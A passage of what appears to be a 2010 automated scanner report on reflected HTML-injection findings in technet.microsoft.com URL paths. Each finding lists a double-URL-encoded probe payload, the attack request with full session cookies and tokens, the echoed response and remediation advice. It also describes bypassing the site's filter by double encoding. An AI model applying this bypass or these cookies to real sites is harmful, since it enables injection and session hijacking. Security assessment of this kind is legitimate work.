Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727032.aspx80878"><a>3c2f7f52469" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de844%2522%253e%253ca%253e2b4581b2944 was submitted in the REST URL parameter 1. This input was echoed as de844"><a>2b4581b2944 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usde844%2522%253e%253ca%253e2b4581b2944/library/bb727034.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:02 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usde844"><a>2b4581b2944/library/bb727034" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3256%2522%253e%253ca%253ed1e3e5457a5 was submitted in the REST URL parameter 2. This input was echoed as d3256"><a>d1e3e5457a5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd3256%2522%253e%253ca%253ed1e3e5457a5/bb727034.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd3256"><a>d1e3e5457a5/bb727034" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e%2522%253e%253ca%253e3804691eb5b was submitted in the REST URL parameter 3. This input was echoed as 7d33e"><a>3804691eb5b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727034.aspx7d33e%2522%253e%253ca%253e3804691eb5b HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727034.aspx7d33e"><a>3804691eb5b" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b156c%2522%253e%253ca%253e1956aeaa3db was submitted in the REST URL parameter 1. This input was echoed as b156c"><a>1956aeaa3db in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usb156c%2522%253e%253ca%253e1956aeaa3db/library/bb727042.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:21:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usb156c"><a>1956aeaa3db/library/bb727042" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e3a2%2522%253e%253ca%253e5fad658b774 was submitted in the REST URL parameter 2. This input was echoed as 8e3a2"><a>5fad658b774 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library8e3a2%2522%253e%253ca%253e5fad658b774/bb727042.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library8e3a2"><a>5fad658b774/bb727042" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac93%2522%253e%253ca%253e62b42b496c3 was submitted in the REST URL parameter 3. This input was echoed as 6ac93"><a>62b42b496c3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727042.aspx6ac93%2522%253e%253ca%253e62b42b496c3 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:27 GMT

